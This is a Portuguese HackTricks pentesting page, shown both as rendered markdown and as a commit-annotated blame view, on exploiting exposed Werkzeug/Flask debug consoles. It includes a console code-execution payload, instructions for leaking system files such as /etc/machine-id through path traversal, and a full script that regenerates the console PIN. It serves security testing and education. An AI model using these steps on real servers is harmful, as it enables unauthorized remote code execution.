hacktricks/network-services-pentesting/pentesting-web/werkzeug.md

# Werkzeug / Flask Debug

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>

[**DragonJAR Security Conference é um evento internacional de cibersegurança**](https://www.dragonjarcon.org/) com mais de uma década que será realizado nos dias 7 e 8 de setembro de 2023 em Bogotá, Colômbia. É um evento de alto conteúdo técnico onde são apresentadas as últimas pesquisas em espanhol que atraem hackers e pesquisadores de todo o mundo.\
Registre-se agora no seguinte link e não perca esta grande conferência!:

{% embed url="https://www.dragonjarcon.org" %}

## Console RCE

Se o modo de depuração estiver ativo, você pode tentar acessar `/console` e obter RCE.
```python
__import__('os').popen('whoami').read();
```
![](<../../.gitbook/assets/image (317).png>)

Também existem várias explorações na internet como [esta](https://github.com/its-arun/Werkzeug-Debug-RCE) ou uma no metasploit.

## Protegido por PIN - Traversal de Caminho

Em algumas ocasiões, o endpoint **`/console`** será protegido por um PIN. Se você tiver uma **vulnerabilidade de travessia de arquivo**, poderá vazar todas as informações necessárias para gerar esse PIN.

### Exploração de PIN do Werkzeug Console

**Copiado do primeiro link.**\
Veja a mensagem "console bloqueado" do Werkzeug forçando a página de erro de depuração no aplicativo.
```
The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server
```
Localize a console de depuração vulnerável do Werkzeug no caminho `vulnerable-site.com/console`, mas está bloqueada por um número PIN secreto.

Você pode reverter o algoritmo que gera o PIN do console. Inspecte o arquivo `__init__.py` de depuração do Werkzeug no servidor, por exemplo, `python3.5/site-packages/werkzeug/debug/__init__.py`. Você pode visualizar o [**repositório de código-fonte do Werkzeug**](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/__init__.py) **para verificar como o PIN é gerado**, mas é melhor vazar o código-fonte por meio de uma **vulnerabilidade de travessia de arquivos**, já que as versões provavelmente são diferentes.

Variáveis necessárias para explorar o PIN do console:
```python
probably_public_bits = [
username,
modname,
getattr(app, '__name__', getattr(app.__class__, '__name__')),
getattr(mod, '__file__', None),
]

private_bits = [
str(uuid.getnode()),
get_machine_id(),
]
```
#### **`probably_public_bits`**

* **`username`** é o usuário que iniciou este Flask
* **`modname`** é flask.app
* `getattr(app, '__name__', getattr (app .__ class__, '__name__'))` é **Flask**
* `getattr(mod, '__file__', None)` é o **caminho absoluto de `app.py`** no diretório do flask (por exemplo, `/usr/local/lib/python3.5/dist-packages/flask/app.py`). Se `app.py` não funcionar, **tente `app.pyc`**

#### `private_bits`

*   `uuid.getnode()` é o **endereço MAC do computador atual**, `str(uuid.getnode())` é a expressão decimal do endereço MAC.

* Para **encontrar o endereço MAC do servidor**, é necessário saber qual **interface de rede está sendo usada** para servir o aplicativo (por exemplo, `ens3`). Se desconhecido, **vaze `/proc/net/arp`** para obter o ID do dispositivo e, em seguida, **vaze** o endereço MAC em **`/sys/class/net/<device id>/address`**.

Converter **de endereço hex para decimal** executando em python, por exemplo:

```python
# Era 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692
```
* `get_machine_id()` concatena os **valores em `/etc/machine-id`** ou **`/proc/sys/kernel/random/boot_id`** com a **primeira linha de `/proc/self/cgroup`** após a última barra (`/`).

<details>

<summary>Código get_machine_id()</summary>
```python
def get_machine_id() -> t.Optional[t.Union[str, bytes]]:
global _machine_id

if _machine_id is not None:
return _machine_id

def _generate() -> t.Optional[t.Union[str, bytes]]:
linux = b""

# machine-id is stable across boots, boot_id is not.
for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id":
try:
with open(filename, "rb") as f:
value = f.readline().strip()
except OSError:
continue

if value:
linux += value
break

# Containers share the same machine id, add some cgroup
# information. This is used outside containers too but should be
# relatively stable across boots.
try:
with open("/proc/self/cgroup", "rb") as f:
linux += f.readline().strip().rpartition(b"/")[2]
except OSError:
pass

if linux:
return linux

# On OS X, use ioreg to get the computer's serial number.
try:
```
</details>

Uma vez que todas as variáveis estiverem preparadas, execute o script de exploração para gerar o PIN do console Werkzeug:
```python
import hashlib
from itertools import chain
probably_public_bits = [
'web3_user',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.5/dist-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
'279275995014060',# str(uuid.getnode()),  /sys/class/net/ens33/address
'd4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id
]

#h = hashlib.md5() # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)
```
{% hint style="success" %}
Se você estiver em uma **versão antiga** do Werkzeug, tente alterar o **algoritmo de hash para md5** em vez de sha1.
{% endhint %}

## Referências

* [**https://www.daehee.com/werkzeug-console-pin-exploit/**](https://www.daehee.com/werkzeug-console-pin-exploit/)
* [**https://ctftime.org/writeup/17955**](https://ctftime.org/writeup/17955)

<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>

[**DragonJAR Security Conference é um evento internacional de cibersegurança**](https://www.dragonjarcon.org/) com mais de uma década que será realizado nos dias **7 e 8 de setembro de 2023** em Bogotá, Colômbia. É um evento com conteúdo técnico de alta qualidade, onde são apresentadas as últimas pesquisas em espanhol, atraindo hackers e pesquisadores de todo o mundo.\
Registre-se agora no seguinte link e não perca esta grande conferência!:

{% embed url="https://www.dragonjarcon.org" %}

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? Ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`# Werkzeug / Flask Debug`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`* Você trabalha em uma empresa de cibersegurança? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Verifique os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`* Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo telegram](https://t.me/peass) ou siga-me no Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated ['README.md', 'macos-hardening/macos-security-and-privilege-e 2023-06-10 23:57:57 +00:00			`<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>`
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`[DragonJAR Security Conference é um evento internacional de cibersegurança](https://www.dragonjarcon.org/) com mais de uma década que será realizado nos dias 7 e 8 de setembro de 2023 em Bogotá, Colômbia. É um evento de alto conteúdo técnico onde são apresentadas as últimas pesquisas em espanhol que atraem hackers e pesquisadores de todo o mundo.\`
			`Registre-se agora no seguinte link e não perca esta grande conferência!:`
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00
			`{% embed url="https://www.dragonjarcon.org" %}`

GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00			`## Console RCE`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			Se o modo de depuração estiver ativo, você pode tentar acessar `/console` e obter RCE.
GitBook: [master] 2 pages and one asset modified 2020-07-30 18:28:28 +00:00			```python
			`__import__('os').popen('whoami').read();`
			```
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`![](<../../.gitbook/assets/image (317).png>)`
GitBook: [master] 2 pages and one asset modified 2020-07-30 18:28:28 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`Também existem várias explorações na internet como [esta](https://github.com/its-arun/Werkzeug-Debug-RCE) ou uma no metasploit.`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Protegido por PIN - Traversal de Caminho`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			Em algumas ocasiões, o endpoint `/console` será protegido por um PIN. Se você tiver uma vulnerabilidade de travessia de arquivo, poderá vazar todas as informações necessárias para gerar esse PIN.
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`### Exploração de PIN do Werkzeug Console`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Copiado do primeiro link.\`
			`Veja a mensagem "console bloqueado" do Werkzeug forçando a página de erro de depuração no aplicativo.`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`The console is locked and needs to be unlocked by entering the PIN.`
			`You can find the PIN printed out on the standard output of your`
			`shell that runs the server`
			```
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			Localize a console de depuração vulnerável do Werkzeug no caminho `vulnerable-site.com/console`, mas está bloqueada por um número PIN secreto.
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			Você pode reverter o algoritmo que gera o PIN do console. Inspecte o arquivo `__init__.py` de depuração do Werkzeug no servidor, por exemplo, `python3.5/site-packages/werkzeug/debug/__init__.py`. Você pode visualizar o [repositório de código-fonte do Werkzeug](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/__init__.py) para verificar como o PIN é gerado, mas é melhor vazar o código-fonte por meio de uma vulnerabilidade de travessia de arquivos, já que as versões provavelmente são diferentes.
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Variáveis necessárias para explorar o PIN do console:`
GitBook: [master] one page modified 2020-11-22 21:53:42 +00:00			```python
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`probably_public_bits = [`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`username,`
			`modname,`
			`getattr(app, '__name__', getattr(app.__class__, '__name__')),`
			`getattr(mod, '__file__', None),`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`]`

			`private_bits = [`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`str(uuid.getnode()),`
			`get_machine_id(),`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`]`
			```
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00			#### `probably_public_bits`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			* `username` é o usuário que iniciou este Flask
			* `modname` é flask.app
			* `getattr(app, '__name__', getattr (app .__ class__, '__name__'))` é Flask
			* `getattr(mod, '__file__', None)` é o caminho absoluto de `app.py` no diretório do flask (por exemplo, `/usr/local/lib/python3.5/dist-packages/flask/app.py`). Se `app.py` não funcionar, tente `app.pyc`
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00
			#### `private_bits`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			* `uuid.getnode()` é o endereço MAC do computador atual, `str(uuid.getnode())` é a expressão decimal do endereço MAC.

Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			* Para encontrar o endereço MAC do servidor, é necessário saber qual interface de rede está sendo usada para servir o aplicativo (por exemplo, `ens3`). Se desconhecido, vaze `/proc/net/arp` para obter o ID do dispositivo e, em seguida, vaze o endereço MAC em `/sys/class/net/<device id>/address`.
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-17 15:28:44 +00:00			`Converter de endereço hex para decimal executando em python, por exemplo:`
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			```python
			`# Era 56:00:02:7a:23:ac`
			`>>> print(0x5600027a23ac)`
			`94558041547692`
			```
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-17 15:28:44 +00:00			* `get_machine_id()` concatena os valores em `/etc/machine-id` ou `/proc/sys/kernel/random/boot_id` com a primeira linha de `/proc/self/cgroup` após a última barra (`/`).
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00
			`<details>`

Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`<summary>Código get_machine_id()</summary>`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			```python
			`def get_machine_id() -> t.Optional[t.Union[str, bytes]]:`
			`global _machine_id`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			`if _machine_id is not None:`
			`return _machine_id`
GitBook: No commit message 2023-08-29 18:57:50 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			`def _generate() -> t.Optional[t.Union[str, bytes]]:`
			`linux = b""`
GitBook: No commit message 2023-08-29 18:57:50 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			`# machine-id is stable across boots, boot_id is not.`
			`for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id":`
			`try:`
			`with open(filename, "rb") as f:`
			`value = f.readline().strip()`
			`except OSError:`
			`continue`
GitBook: No commit message 2023-08-29 18:57:50 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			`if value:`
			`linux += value`
			`break`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			`# Containers share the same machine id, add some cgroup`
			`# information. This is used outside containers too but should be`
			`# relatively stable across boots.`
			`try:`
			`with open("/proc/self/cgroup", "rb") as f:`
			`linux += f.readline().strip().rpartition(b"/")[2]`
			`except OSError:`
			`pass`
GitBook: No commit message 2023-08-29 18:57:50 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			`if linux:`
			`return linux`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			`# On OS X, use ioreg to get the computer's serial number.`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`try:`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			```
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00			`</details>`

Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`Uma vez que todas as variáveis estiverem preparadas, execute o script de exploração para gerar o PIN do console Werkzeug:`
GitBook: [master] one page modified 2020-11-22 21:53:42 +00:00			```python
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`import hashlib`
			`from itertools import chain`
			`probably_public_bits = [`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`'web3_user',# username`
			`'flask.app',# modname`
			`'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))`
			`'/usr/local/lib/python3.5/dist-packages/flask/app.py' # getattr(mod, '__file__', None),`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`]`

			`private_bits = [`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`'279275995014060',# str(uuid.getnode()), /sys/class/net/ens33/address`
			`'d4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`]`

GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00			`#h = hashlib.md5() # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0`
			`h = hashlib.sha1()`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`for bit in chain(probably_public_bits, private_bits):`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`if not bit:`
			`continue`
			`if isinstance(bit, str):`
			`bit = bit.encode('utf-8')`
			`h.update(bit)`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`h.update(b'cookiesalt')`
			`#h.update(b'shittysalt')`

			`cookie_name = '__wzd' + h.hexdigest()[:20]`

			`num = None`
			`if num is None:`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`h.update(b'pinsalt')`
			`num = ('%09d' % int(h.hexdigest(), 16))[:9]`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
			`rv =None`
			`if rv is None:`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-07-10 10:40:32 +00:00			`for group_size in 5, 4, 3:`
			`if len(num) % group_size == 0:`
			`rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')`
			`for x in range(0, len(num), group_size))`
			`break`
			`else:`
			`rv = num`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
			`print(rv)`
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			```
			`{% hint style="success" %}`
			`Se você estiver em uma versão antiga do Werkzeug, tente alterar o algoritmo de hash para md5 em vez de sha1.`
			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			`## Referências`
GITBOOK-3842: change request with no subject merged in GitBook 2023-03-28 22:07:13 +00:00
GITBOOK-3863: change request with no subject merged in GitBook 2023-04-05 15:16:57 +00:00			`* [https://www.daehee.com/werkzeug-console-pin-exploit/](https://www.daehee.com/werkzeug-console-pin-exploit/)`
			`* [https://ctftime.org/writeup/17955](https://ctftime.org/writeup/17955)`
GITBOOK-3842: change request with no subject merged in GitBook 2023-03-28 22:07:13 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			`<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>`
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			`[DragonJAR Security Conference é um evento internacional de cibersegurança](https://www.dragonjarcon.org/) com mais de uma década que será realizado nos dias 7 e 8 de setembro de 2023 em Bogotá, Colômbia. É um evento com conteúdo técnico de alta qualidade, onde são apresentadas as últimas pesquisas em espanhol, atraindo hackers e pesquisadores de todo o mundo.\`
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Registre-se agora no seguinte link e não perca esta grande conferência!:`
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00
Translated ['network-services-pentesting/pentesting-web/werkzeug.md'] to 2023-09-18 17:03:15 +00:00			`{% embed url="https://www.dragonjarcon.org" %}`

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* Você trabalha em uma empresa de cibersegurança? Você quer ver sua empresa anunciada no HackTricks? Ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Verifique os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Descubra [The PEASS Family](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo telegram](https://t.me/peass) ou siga-me no Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`</details>`